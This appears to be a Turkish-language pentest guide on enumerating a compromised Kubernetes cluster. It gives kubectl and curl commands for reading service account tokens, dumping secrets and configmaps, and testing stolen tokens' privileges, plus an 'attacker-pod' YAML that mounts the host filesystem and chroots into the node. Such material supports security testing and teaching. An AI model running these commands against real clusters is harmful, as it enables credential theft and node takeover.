Kubernetes Enumeration

Kubernetes Tokenleri

Bir makineye erişiminiz varsa, kullanıcı bazı Kubernetes platformlarına erişime sahip olabilir. Token genellikle env var KUBECONFIG tarafından işaret edilen bir dosyada veya ~/.kube içinde bulunur.

Bu klasörde API sunucusuna bağlanmak için tokenler ve yapılandırmalar içeren yapılandırma dosyaları bulabilirsiniz. Bu klasörde ayrıca daha önce alınan bilgileri içeren bir önbellek klasörü de bulabilirsiniz.

Eğer bir Kubernetes ortamında bir pod'u ele geçirdiyseniz, tokenler ve mevcut K8 ortamı hakkında bilgi bulabileceğiniz başka yerler de vardır:

Servis Hesabı Tokenleri

Devam etmeden önce, Kubernetes'te bir servisin ne olduğunu bilmiyorsanız, bu bağlantıyı takip etmenizi ve en azından Kubernetes mimarisi hakkında bilgileri okumanızı öneririm.

Kubernetes belgelerinden alınmıştır:

“Bir pod oluşturduğunuzda, bir servis hesabı belirtmezseniz, otomatik olarak aynı ad alanındaki varsayılan servis hesabına atanır.”

ServiceAccount, Kubernetes tarafından yönetilen ve bir pod içinde çalışan süreçler için bir kimlik sağlamak için kullanılan bir nesnedir. Her servis hesabının ona bağlı bir sırrı vardır ve bu sır, bir taşıyıcı token içerir. Bu, iki taraf arasında talepleri güvenli bir şekilde temsil etmenin bir yolu olan JSON Web Token (JWT) dir.

Genellikle bir dizin:

• /run/secrets/kubernetes.io/serviceaccount

• /var/run/secrets/kubernetes.io/serviceaccount

• /secrets/kubernetes.io/serviceaccount

aşağıdaki dosyaları içerir:

• ca.crt: Kubernetes iletişimlerini kontrol etmek için ca sertifikasıdır

• namespace: Mevcut ad alanını belirtir

• token: Mevcut pod'un servis tokenini içerir.

Artık token'e sahip olduğunuza göre, API sunucusunu KUBECONFIG ortam değişkeni içinde bulabilirsiniz. Daha fazla bilgi için (env | set) | grep -i "kuber|kube" komutunu çalıştırın.

Servis hesabı tokeni, sa.key dosyasında bulunan anahtar ile imzalanır ve sa.pub tarafından doğrulanır.

Kubernetes üzerindeki varsayılan konum:

• /etc/kubernetes/pki

Minikube üzerindeki varsayılan konum:

• /var/lib/localkube/certs

Sıcak Podlar

Sıcak podlar, ayrıcalıklı bir servis hesabı tokeni içeren podlardır. Ayrıcalıklı bir servis hesabı tokeni, gizli bilgileri listeleme, pod oluşturma gibi ayrıcalıklı görevleri yapma iznine sahip bir token'dır.

RBAC

Eğer RBAC'ın ne olduğunu bilmiyorsanız, bu bölümü okuyun.

GUI Uygulamaları

• k9s: Terminalden bir Kubernetes kümesini listeleyen bir GUI. Komutları kontrol edin https://k9scli.io/topics/commands/. :namespace yazın ve tümünü seçerek tüm ad alanlarındaki kaynakları arayın.

• k8slens: Bazı ücretsiz deneme günleri sunar: https://k8slens.dev/

Enumeration CheatSheet

Bir K8s ortamını listelemek için şunlara ihtiyacınız var:

• geçerli bir kimlik doğrulama tokeni. Önceki bölümde bir kullanıcı tokeni ve bir servis hesabı tokeni için nerede arama yapacağımızı gördük.

• Kubernetes API'sinin adresi (https://host:port). Bu genellikle ortam değişkenlerinde ve/veya kube yapılandırma dosyasında bulunabilir.

• Opsiyonel: API sunucusunu doğrulamak için ca.crt. Bu, tokenin bulunabileceği aynı yerlerde bulunabilir. Bu, API sunucusu sertifikasını doğrulamak için yararlıdır, ancak kubectl ile --insecure-skip-tls-verify veya curl ile -k kullanarak buna ihtiyacınız olmayacaktır.

Bu detaylarla kubernetes'i listeleyebilirsiniz. Eğer API bir nedenle İnternet üzerinden erişilebilir ise, bu bilgiyi indirip platformu kendi makinenizden listeleyebilirsiniz.

Ancak genellikle API sunucusu dahili bir ağdadır, bu nedenle ona erişmek için ele geçirilmiş makine üzerinden bir tünel oluşturmanız gerekecektir veya kubectl binariesini yükleyebilir veya curl/wget/anything kullanarak API sunucusuna ham HTTP istekleri gönderebilirsiniz.

list ve get fiilleri arasındaki farklar

get izinleri ile belirli varlıkların bilgilerine erişebilirsiniz (kubectl'deki describe seçeneği) API:

GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}

Eğer list iznine sahipseniz, bir varlık türünü listelemek için API istekleri gerçekleştirme izniniz vardır (kubectl'deki get seçeneği):

#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments

Eğer watch iznine sahipseniz, varlıkları izlemek için API istekleri gerçekleştirme izniniz vardır:

GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
GET /apis/apps/v1/watch/deployments  [DEPRECATED]

Bir değişiklik olduğunda (veya yeni bir tane oluşturulduğunda) size bir Deployment'ın tam manifestosunu döndüren bir akış bağlantısı açarlar.

curl Kullanarak

Bir podun içinden birkaç ortam değişkeni kullanabilirsiniz:

export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.

kubectl Kullanımı

Token ve API sunucusunun adresine sahip olduğunuzda, burada belirtildiği gibi erişmek için kubectl veya curl kullanabilirsiniz:

Varsayılan olarak, APISERVER https:// şeması ile iletişim kurmaktadır.

alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces

Eğer URL'de https:// yoksa, Bad Request gibi bir hata alabilirsiniz.

Burada resmi kubectl kılavuzunu bulabilirsiniz. Aşağıdaki bölümlerin amacı, erişim sağladığınız yeni K8s'i sıralı bir şekilde enumerate etmek ve anlamak için farklı seçenekleri sunmaktır.

kubectl'nin gönderdiği HTTP isteğini bulmak için -v=8 parametresini kullanabilirsiniz.

MitM kubectl - kubectl'i Proxy'lemek

# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true

Mevcut Konfigürasyon

kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>

Eğer bazı kullanıcıların kimlik bilgilerini çalmayı başardıysanız, bunları yerel olarak yapılandırabilirsiniz şöyle bir şey kullanarak:

kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )

Desteklenen Kaynakları Al

Bu bilgiyle listeleyebileceğiniz tüm hizmetleri bileceksiniz

k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace

Mevcut Yetkileri Al

k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>

kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"

Yetki kontrolü yapmanın bir diğer yolu: https://github.com/corneliusweig/rakkess****

Kubernetes RBAC hakkında daha fazla bilgi edinebilirsiniz:

Hangi yetkilere sahip olduğunuzu öğrendikten sonra, yetkileri yükseltmek için bunları kötüye kullanıp kullanamayacağınızı öğrenmek için aşağıdaki sayfayı kontrol edin:

Diğer rollerin alınması

k get roles
k get clusterroles

kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"

Ad alanlarını al

Kubernetes, aynı fiziksel küme tarafından desteklenen birden fazla sanal küme'yi destekler. Bu sanal kümelere ad alanları denir.

k get namespaces

kurl -k -v https://$APISERVER/api/v1/namespaces/

Gizli bilgileri al

k get secrets -o yaml
k get secrets -o yaml -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/

kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/

Eğer gizli bilgileri okuyabiliyorsanız, her bir token ile ilgili ayrıcalıkları almak için aşağıdaki satırları kullanabilirsiniz:

for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done

Hizmet Hesaplarını Al

Bu sayfanın başında tartışıldığı gibi bir pod çalıştırıldığında genellikle ona bir hizmet hesabı atanır. Bu nedenle, hizmet hesaplarını, izinlerini ve nerede çalıştıklarını listelemek, bir kullanıcının ayrıcalıkları artırmasına olanak tanıyabilir.

k get serviceaccounts

kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts

Dağıtımları Al

Dağıtımlar, çalıştırılması gereken bileşenleri belirtir.

k get deployments
k get deployments -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/

Podları Al

Podlar, çalışacak olan gerçek konteynerlerdir.

k get pods
k get pods -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/

Hizmetleri Al

Kubernetes hizmetleri, bir hizmeti belirli bir port ve IP'de açmak için kullanılır (bu, aslında hizmeti sunan pod'lara yük dengeleyici olarak işlev görecektir). Bu, saldırmayı denemek için diğer hizmetleri nerede bulabileceğinizi bilmek açısından ilginçtir.

k get services
k get services -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/default/services/

Düğümleri Al

Küme içinde yapılandırılmış tüm düğümleri al.

k get nodes

kurl -v https://$APISERVER/api/v1/nodes/

DaemonSet'leri Al

DaemonSet'ler, belirli bir pod'un kümenin tüm düğümlerinde (veya seçilenlerde) çalıştığından emin olmayı sağlar. DaemonSet'i silerseniz, onun tarafından yönetilen pod'lar da kaldırılacaktır.

k get daemonsets

kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets

Cronjob Al

Cron işleri, belirli bir eylemi gerçekleştirecek bir pod'un başlatılmasını crontab benzeri bir sözdizimi kullanarak planlamaya olanak tanır.

k get cronjobs

kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs

configMap'ı Al

configMap her zaman kubernetes'te çalışan uygulamalara sağlanan birçok bilgi ve yapılandırma dosyası içerir. Genellikle, diğer iç/dış hizmetlere bağlanmak ve doğrulamak için kullanılan birçok şifre, gizli anahtar ve token bulabilirsiniz.

k get configmaps # -n namespace

kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps

Ağ Politikalarını Al / Cilium Ağ Politikaları

k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies

Her Şeyi Al / Hepsi

k get all

Helm tarafından yönetilen tüm kaynakları al

k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'

Pod tüketimlerini al

k top pod --all-namespaces

Pod'dan kaçış

Yeni pod'lar oluşturabiliyorsanız, bunlardan node'a kaçış yapabilirsiniz. Bunu yapmak için bir yaml dosyası kullanarak yeni bir pod oluşturmanız, oluşturulan pod'a geçiş yapmanız ve ardından node'un sistemine chroot yapmanız gerekir. Mevcut görüntüleri ve yolları gösterdikleri için yaml dosyası için referans olarak mevcut pod'ları kullanabilirsiniz.

kubectl get pod <name> [-n <namespace>] -o yaml

Eğer belirli bir düğümde pod oluşturmanız gerekiyorsa, düğüm üzerindeki etiketleri almak için aşağıdaki komutu kullanabilirsiniz.

k get nodes --show-labels

Genellikle, kubernetes.io/hostname ve node-role.kubernetes.io/master, seçim için iyi etiketlerdir.

Sonra attack.yaml dosyanızı oluşturursunuz.

apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
#  kubernetes.io/hostname: master
# or using
#  node-role.kubernetes.io/master: ""

original yaml source

Bundan sonra pod'u oluşturursunuz.

kubectl apply -f attacker.yaml [-n <namespace>]

Artık oluşturulan pod'a aşağıdaki gibi geçiş yapabilirsiniz

kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file

Ve sonunda node'un sistemine chroot yaparsınız.

chroot /root /bin/bash

Bilgi alındı: Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1 Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1

Referanslar

Kubernetes Pentest Methodology Part 3CyberArk